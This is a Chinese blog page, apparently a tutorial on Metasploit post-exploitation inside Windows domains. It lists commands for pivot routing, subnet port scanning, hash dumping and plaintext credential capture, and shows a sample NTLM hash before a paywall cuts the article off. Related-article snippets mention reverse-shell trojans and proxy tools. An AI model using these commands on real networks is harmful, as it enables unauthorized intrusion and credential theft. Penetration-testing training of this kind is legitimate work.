渗透必看!MSF 下域内渗透实战

最新推荐文章于 2023-05-07 23:23:53 发布
最新推荐文章于 2023-05-07 23:23:53 发布
阅读量724 收藏 3
点赞数
分类专栏: 技术文 免费分享 Linux 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Appleteachers/article/details/117171780
版权
本文介绍了在MSF框架下进行域内渗透的方法,包括获取域内机器session、添加路由、扫描端口、获取hash值、端口转发、收集域环境信息、找寻域控、弱口令爆破、键盘记录、假冒令牌等步骤,详细阐述了渗透过程和技术手段。
摘要由CSDN通过智能技术生成

先获取域内机器session
在这里插入图片描述

run get_local_subnets //获取本地网络子网掩码

route add 192.168.233.0 255.255.255.0 1 //添加路由表

run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由

run autoroute -s 192.168.2.0/24 //添加动态路由

route print //打印路由表

use auxliary/scanner/portscan/tcp //使用扫描模块对整个 C 段跨网段扫描

use priv //运行注入

run post/windows/gather/hashdump //获取用户名 hash 值
在这里插入图片描述

Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4

只要是管理员在线或者没有注销。我们可以抓取明文的

kerberos //管理员在线或者没有注销下获取明文

在这里插入图片描述

3.收集域环境信息+找到域控

利用msf 的端口转发功能来转发一下,

最低0.47元/天 解锁文章
你永远不了解Thrash的魅力
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF 下域渗透
Candour_0的博客
03-15 355
MSF 下域渗透实战先获取域内机器sessionrun get_local_subnets //获取本地网络子网掩码route add 192.168.233.0 255.255.255.0 1 //添加路由表run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由run autoroute -s 192.168.2.0/24 //添加动态路由route print //打印路由表。
利用Metasploit Framework(msf)进行内网(域)渗透
初学者L_言的博客
07-03 5433
只要去往 192.168.47.0这个网段的数据都将通过 Session转发出去!!! 内网进行端口扫描:use auxiliary/scanner/portscan/tcp use exploit/windows/smb/ms08_067_netapi
ATT&CK实战系列三(msf渗透
weixin_44155363的博客
08-01 1550
因为这次为黑盒测试,给了5个虚拟机,centos为出网机器,具体的ip配置如下: web-centos:192.168.93.100 外网:192.168.167.135 web-ubantu:192.168.93.120 win7:192.168.93.30 win2008:192.168.93.20 win2012:192.168.93.10 给ip是为了提前把网络调通,免得浪费不必要的时间,保证网络通畅后将其余ip视为不知,仅从web-centos开始; 就一个是双网卡,其余都是单网卡内网机器 c
MSF实现远程渗透
WFC1006848997的博客
01-12 2564
MSF实现远程渗透 在本地测试腻了的小伙伴安耐不住,想耍耍远程的朋友,奈何不会msf远程渗透,服务器搭建也不会,那怎么办呢?今天笔者将分享一个让你本地的kali也能耍耍你远方的朋友,上才艺。 0x01环境准备 系统:Kali linux 工具:MSF、 Sunny-Ngrok 0x02环境部署 打开Sunny官网 (www.ngrok.cc),点击注册 完成注册登录,点击隧道管理,点击开通隧道,选择0元白嫖,当然你可以选择其他,笔者只能白嫖 可阅读,确认 隧道协议选择tcp,然后为你的隧道取个名称,选
msf完整渗透测试
clayzx的博客
11-15 6567
从生成shell到远程连接 前言: 本来是最近打算把时间都花在学c上,渗透目前跟着老师学以后研究,但为了后续上课需求,就必须把这个给拿下了,于是花了今天一天的时间都在研究这个,写一篇详细的实验结果,为了给自己做笔记,也为了刚学msfconsole提供一个资料参考。不说废话了,以下是我们这篇的目标: 1.生成shell 2.上shell 3.监听 4.拿到会话 5.提权 6.拿到密码 7.远程连接 首先此次实验需要准备一台kali的虚拟机和一台windows 7的
kali的实战渗透
12-14
写的是kali的实战渗透,其中有讲msf渗透,kali基础命令使用等等等,非常多
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但...
渗透工具MSF系列培训教程(共17课)10-17课
06-20
第1课:什么是Metasploit 第2课:如何安装Metasploit 第3课:如何更新MSF及其结构 第4课:msf用户接口及核心命令 第5课:Exploits模块 第6课:payloads模块 第7课:利用MSF攻击windows ...第17课:MSF实战应用演示
小迪第九期渗透培训
11-19
### 小迪第九期渗透培训知识点汇总 ...以上内容为小迪第九期渗透培训的部分核心知识点,通过这些内容的学习,学员能够全面了解渗透测试的基本流程、掌握关键技术和工具,并能够通过实战训练提升自己的安全技能。
msf 代理内网机器后,进行内网其他网段机器的渗透
weixin_40709439的博客
12-29 2892
##titile :msf 代理内网机器后,进行内网其他网段机器的渗透 首先利用反弹木马返回meterpreter shell 利用这个shell 查该机器网段,及添加路由,为渗透其他的机器做准备 run get_local_subnets //获取路由地址 run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由 run autoroute -p //查看添加...
一个简单的msf远程渗透实验
JYLCG的博客
05-08 1138
原文链接 网络攻防如同打仗 知己知彼百战不殆 要想学会防守必先知道敌人如何进攻 此教程的远端测试全是我的好友帮助测试 并非实际攻击!!! 写一篇远程的渗透教程给大家 当然不是为了教大家去黑别人电脑 而是让大家明白原理,懂得如何防范,再三强调!!! 使用此教程用在不正当地方造成的后果与本人无关!...
内网渗透-做代理流量转发-msf跨网段攻击(添加路由表)-Windows中ew和proxifier做代理-kali中ew和proxychains4做代理
没有
05-17 2291
0x01代理-windows中ew和proxifier 1.在靶机上上传ew 然后输入下面命令运行,正向代理 ew_for_windows.exe -s sscoked -l 8000 2.在windows启用proxifier,添加服务器,输入靶机上的ip和端口 3.设置代理规则 第一步截图: 第二步截图: 第三步截图: 你可以使用代理了 0x02代理-kali中ew和proxychains4做代理 1.在靶机上上传ew 然后输入下面命令运行,正向代理 ew_for_windows.exe -s
Metasploit域渗透测试全程实录(终结篇)
dfdhxb995397的博客
11-15 263
本文作者:i春秋签约作家——shuteer 前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里。于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求。今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来。相关知识点总结如下: 免杀payload的生成,请...
好文转载 ONE DAY |网络安全渗透测试之跨网段攻击
AI_data_cloud的博客
05-05 699
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
记一次简单域渗透(part 1)
初学者L_言的博客
11-12 2184
一、环境 域环境是自己搭的,基本模仿的企业部署 域:learn.com 操作系统类型 IP地址 本地账户/密码 域账户/密码 角色 Windows 2008 R2 192.168.138.129 Administrator/ learn\Administrator DC域控 win@2008.com win@2008.com
从零开始学网安:Day3 体验跨网段渗透与后渗透经验分享
最新发布
无业de小白的博客
05-07 397
这一次分享一些跨网段渗透与简单后渗透操作体验。可以当成两个独立的实验来看待。有尝试过两个合并完成,但由于winxp连接不稳定等因素,展示后渗透效果没有直接在win7上展示好。所以可以换一下实验流程,将winxp作为跳板,win7作为靶机效果更好。
msf添加域控
weixin_50683638的博客
04-29 268
1、此篇文章仍与上续几篇msf相关,结合一下,作为此章节的笔记。 2,在msf中有很多模块,各模块用法就不一一赘述,简单说下所需要的模块内容。用这个模块来迁移进程,让meterpreter和session在同位。设置需要迁移进程的session。 3、添加路由run autoroute -s 192.168.1.0/24 run autoroute -p 4、扫描内网 use post/windows/gather/arp_scanner 设置需要扫描内网的ip和端口 再用use auxiliary
metasploit后渗透之域信息收集
Longwaer
01-30 991
通过学习了解metasploit各种渗透小技巧,从而更好的掌握后渗透技术。
9、Metasploit域渗透测试全程实录
Fly_鹏程万里
06-11 952
前期准备:1. 使用Veil生成免杀PAYLOAD2. 有一个外网IP的服务器,安装好metasploit,方便操作一.Shell反弹meterpreter上传免杀的PAYLOAD到SHELL(有时候会碰到EXE文件上传不了,可以使用powershell的meterpreter模块“XX.bat格式”来实现),然后在菜刀或者WEBSHELL下面运行,反弹成功。 二.提权反弹成功后第一步就是getu...
Kali Linux渗透测试实战指南
其次,手册深入Metasploit实战,这是渗透测试中的关键工具。学习内容包括MSF终端的使用,选择和配置攻击模块,设定攻击目标和选择合适的攻击载荷。这些步骤是渗透测试流程的关键环节,对于理解攻击机制和执行实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值